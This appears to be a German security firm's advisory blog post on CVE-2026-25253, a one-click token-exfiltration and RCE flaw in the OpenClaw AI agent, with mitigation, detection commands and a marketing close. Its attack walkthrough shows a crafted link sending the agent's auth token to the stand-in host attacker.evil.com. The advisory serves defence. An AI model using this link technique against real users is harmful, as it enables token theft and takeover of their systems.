CVE-2026-25253: Kritische 1-Click RCE in OpenClaw AI Agent

Diese Woche in unserer InSEKurity of the Week Serie: Eine kritische 1-Click Remote Code Execution-Schwachstelle im beliebten Open-Source AI Agent OpenClaw, die durch Auth Token Exfiltration ausgenutzt werden kann.

🚨 Zusammenfassung

CVE-ID: CVE-2026-25253
EUVD-ID: EUVD-2026-5280
CVSS 3.1 Score: 8.8 (High)
CWE: CWE-669 (Incorrect Resource Transfer Between Spheres)
Betroffene Software: OpenClaw (aka Clawdbot, Moltbot) <= v2026.1.24-1
Angriffsvektor: Netzwerk (Unauthenticated Remote Attack)
Authentifizierung erforderlich: Keine
Auswirkung: Remote Code Execution, Authentication Token Exfiltration
Patch-Status: ✅ Verfügbar (Version v2026.1.29)
Veröffentlichung: 30. Januar 2026
Exploit-Komplexität: Sehr niedrig (1-Click)

🤖 Was ist OpenClaw?

OpenClaw (früher bekannt als Clawdbot und Moltbot) ist ein beliebter Open-Source AI Agent, der es Nutzern ermöglicht, komplexe Aufgaben zu automatisieren und mit verschiedenen APIs und Services zu interagieren. Als AI-Assistant mit Code-Ausführungsfähigkeiten hat OpenClaw Zugriff auf sensible Daten und Systeme der Nutzer.

Die Software wird von Tausenden Entwicklern und Unternehmen weltweit eingesetzt für:

Automatisierung von Workflows
Integration mit Cloud-Services
API-Testing und -Development
DevOps-Aufgaben
Datenaggregation und -verarbeitung

🔍 Technische Analyse

Beschreibung der Schwachstelle

CVE-2026-25253 ist eine Incorrect Resource Transfer-Schwachstelle, die es Angreifern ermöglicht, durch einen einzigen Klick auf einen manipulierten Link die vollständige Kontrolle über das System eines Opfers zu erlangen.

Die Schwachstelle basiert auf einer Logic Flaw in der Verarbeitung von URL-Parametern: OpenClaw akzeptiert einen gatewayUrl-Parameter aus dem Query String und etabliert automatisch eine WebSocket-Verbindung zu dieser URL - ohne Nutzerbestätigung und ohne Validierung der Ziel-URL.

Ursachenanalyse

Das Problem liegt in drei kritischen Designfehlern:

Fehlende URL-Validierung: Die Anwendung prüft nicht, ob die gatewayUrl zu einer vertrauenswürdigen Domain gehört
Automatische WebSocket-Verbindung: Verbindung wird sofort hergestellt, ohne Nutzerinteraktion oder Warnung
Token-Transmission: Authentication Tokens werden automatisch über die WebSocket-Verbindung übertragen

Angriffsvektor

Ein typischer 1-Click-Angriff verläuft wie folgt:

# Schritt 1: Angreifer erstellt einen manipulierten Link
# Der Link enthält eine attacker-kontrollierte gatewayUrl

https://openclaw-app.example.com/?gatewayUrl=wss://attacker.evil.com/ws

# Schritt 2: Opfer klickt auf den Link (z.B. in Email, Chat, Social Media)
# OpenClaw öffnet sich automatisch mit der manipulierten URL

# Schritt 3: OpenClaw etabliert WebSocket-Verbindung zum Angreifer
# Ohne Nutzerbestätigung oder Warnung

WebSocket Connection: wss://attacker.evil.com/ws
Sending: {"type":"auth","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."}

# Schritt 4: Angreifer empfängt Authentication Token
# Token ermöglicht vollständigen Zugriff auf OpenClaw-Instanz

# Schritt 5: Angreifer führt beliebige Befehle aus
# Mit dem gestohlenen Token kann der Angreifer:
# - API-Keys extrahieren
# - Lokale Dateien lesen/schreiben
# - Code auf dem System ausführen
# - Auf Cloud-Services zugreifen

Konkrete Ausnutzungsszenarien:

Phishing-Kampagnen: Massenversand von manipulierten Links per Email
Social Engineering: Teilen von Links in Slack, Discord, GitHub Issues
Watering Hole: Platzierung von Links auf kompromittierten Websites
Supply Chain: Einschleusen von Links in Documentation, Tutorials
Malvertising: Schadhafte Werbung mit OpenClaw-Links

Auswirkungen

Nach erfolgreicher Token-Exfiltration kann der Angreifer:

API-Keys stehlen: Zugriff auf AWS, Azure, GitHub, OpenAI, etc.
Lokalen Code ausführen: RCE auf dem System des Opfers
Daten exfiltrieren: Projektdateien, Credentials, Secrets
Persistenz etablieren: Backdoors installieren
Lateral Movement: In verbundene Systeme eindringen

⚠️ Folgenabschätzung

Unmittelbare Auswirkung

1-Click RCE: Keine Nutzerinteraktion außer Link-Klick erforderlich
Token Exfiltration: Vollständiger Zugriff auf OpenClaw-Instanz
Keine Warnung: Opfer merken den Angriff nicht
Breite Angriffsfläche: Jeder Link kann manipuliert werden

Betroffene Umgebungen

Besonders gefährdet sind:

Entwickler: Die OpenClaw für Automatisierung nutzen
DevOps-Teams: Mit Zugriff auf Produktionssysteme
Cloud-Administrator: Mit privilegierten API-Keys
Data Scientists: Mit Zugriff auf sensible Datensätze
Unternehmen: Die OpenClaw in Workflows integriert haben

Angreiferprofile

Die Schwachstelle ist attraktiv für:

Phishing-Angreifer: Für Massen-Credential-Harvesting
APT-Gruppen: Für gezielte Kompromittierung von Entwicklern
Ransomware-Betreiber: Für initiale Zugangsmöglichkeiten
Supply-Chain-Angreifer: Für Kompromittierung von Build-Pipelines

🛡️ Mitigationsstrategien

Sofortmaßnahmen (Priorität 1) ⚡

Update auf v2026.1.29 oder höher:

# Version prüfen
openclaw --version

# Update durchführen (npm)
npm update -g openclaw

# Update durchführen (aus Source)
git pull origin main
npm install
npm run build

Alle Authentication Tokens rotieren:

# KRITISCH: Nach dem Update ALLE Tokens ändern!

# AWS Credentials rotieren
aws iam create-access-key --user-name your-user
aws iam delete-access-key --access-key-id OLD_KEY_ID

# GitHub Token rotieren
# Über https://github.com/settings/tokens

# OpenAI API Key rotieren
# Über https://platform.openai.com/account/api-keys

# Weitere API-Keys rotieren
# Je nach genutzten Services

Logs auf Kompromittierung prüfen:

# OpenClaw-Logs durchsuchen
grep -r "gatewayUrl" ~/.openclaw/logs/

# WebSocket-Verbindungen zu unbekannten Hosts
grep -E "wss?://[^openclaw]" ~/.openclaw/logs/

# Ungewöhnliche API-Aufrufe
grep "auth" ~/.openclaw/logs/ | grep -v "openclaw.io"

Netzwerk-Monitoring aktivieren:
- WebSocket-Verbindungen zu externen Hosts überwachen
- Ungewöhnliche Datenexfiltration detektieren
- Firewall-Regeln für ausgehende Verbindungen verschärfen

Detektionsmaßnahmen 🔍

Indicators of Compromise (IoCs):

# Verdächtige WebSocket-Verbindungen
lsof -i -n -P | grep -i websocket | grep -v "openclaw.io"

# Browser-History nach manipulierten Links durchsuchen
grep "gatewayUrl=" ~/.config/*/History ~/.mozilla/*/places.sqlite

# Netzwerk-Traffic auf Token-Leaks prüfen
tcpdump -i any -A -s 0 'tcp port 443' | grep -i "bearer\|token\|api"

# Prozess-Liste auf unerwartete Verbindungen prüfen
netstat -antup | grep "openclaw"

SIEM-Regeln:

Alert bei WebSocket-Verbindungen zu non-whitelisted Domains
Monitoring von Token-Übertragungen in Network-Traffic
Detektion von Mass-Link-Clicking-Patterns
Logging von URL-Parameter-Manipulation

Langfristige Sicherheitsverbesserungen

Least Privilege: OpenClaw mit minimalen Berechtigungen ausführen
Network Segmentation: AI Agents in isolierten Netzwerken betreiben
Token-Scoping: API-Keys mit minimalen Rechten und Ablaufdatum
Security Awareness: Mitarbeiter über Phishing mit AI-Tools schulen
Link-Validation: URL-Scanner in Email-Gateways integrieren

🎯 Warum ist das kritisch?

1-Click Exploitation: Extrem niedrige Angriffsschwelle
AI Agent Security: Neue Angriffsvektoren durch AI-Tools
Token Exfiltration: Zugriff auf alle verbundenen Services
Breite Nutzerbasis: Tausende Entwickler und Unternehmen betroffen
Supply Chain Risk: Kompromittierung von Build-Pipelines möglich
Keine Nutzerwarnung: Angriff verläuft völlig unsichtbar
PoC verfügbar: Erhöht die Wahrscheinlichkeit aktiver Ausnutzung

📊 Betroffene Versionen und Erkennung

Anfällige Versionen

OpenClaw: Alle Versionen <= v2026.1.24-1
Clawdbot: Alle Versionen (alter Name)
Moltbot: Alle Versionen (alter Name)
Sichere Version: >= v2026.1.29

Automatische Erkennung

#!/bin/bash
# Scan-Skript für anfällige OpenClaw-Installationen

echo "Scanning for vulnerable OpenClaw installations..."

# Globale npm-Installation prüfen
NPM_VERSION=$(npm list -g openclaw 2>/dev/null | grep openclaw@ | sed 's/.*@//;s/ .*//')
if [ -n "$NPM_VERSION" ]; then
    echo "Found global OpenClaw: v$NPM_VERSION"
    if [ "$(printf '%s\n' "2026.1.29" "$NPM_VERSION" | sort -V | head -n1)" != "2026.1.29" ]; then
        echo "⚠️  VULNERABLE: Global OpenClaw v$NPM_VERSION"
    else
        echo "✅ SAFE: Global OpenClaw v$NPM_VERSION"
    fi
fi

# Lokale Installationen finden
find /home /Users -name "package.json" -type f 2>/dev/null | while read pkg; do
    if grep -q "openclaw" "$pkg"; then
        dir=$(dirname "$pkg")
        version=$(jq -r '.dependencies.openclaw // .devDependencies.openclaw' "$pkg" 2>/dev/null)
        if [ "$version" != "null" ] && [ -n "$version" ]; then
            echo "Found local OpenClaw in $dir: $version"
        fi
    fi
done

🚀 Zeitplan und Offenlegung

Entdeckungsdatum: Januar 2026
CVE-Zuweisung: CVE-2026-25253
Patch-Veröffentlichung: 30. Januar 2026 (v2026.1.29)
Öffentliche Offenlegung: 30. Januar 2026
PoC-Veröffentlichung: 31. Januar 2026

🔗 Ressourcen und Referenzen

CVE: CVE-2026-25253
CWE: CWE-669: Incorrect Resource Transfer Between Spheres
OpenClaw GitHub: Repository
Security Advisory: OpenClaw Security Advisory 2026-01

💼 SEKurity unterstützt Sie

Diese Schwachstelle zeigt die neuen Sicherheitsrisiken, die durch AI-Agents und Automatisierungstools entstehen. Ein einzelner Klick kann zur vollständigen Kompromittierung führen.

Unsere Leistungen

Penetrationstests: Web-Anwendungen, Mobile Apps (Android & iOS), SAP-Systeme, Active Directory
Großflächige Angriffe: Perimeter-Tests, IT-Infrastruktur-Tests, Red Team Engagements
Security Awareness: Phishing-Kampagnen, Hacking-Demonstrationen

Handeln Sie jetzt – bevor Angreifer es tun.

Kontakt:

🌐 Webseite: www.sekurity.de

📧 Anfragen: www.sekurity.de/kontakt

📱 LinkedIn: SEKurity GmbH

Ihr SEKurity Team – Your Trusted Adversaries

Die Sicherheit Ihrer AI-Workflows ist unser Antrieb.

InSEKurity of the Week (CW06/2026): OpenClaw AI Agent 1-Click RCE (CVE-2026-25253)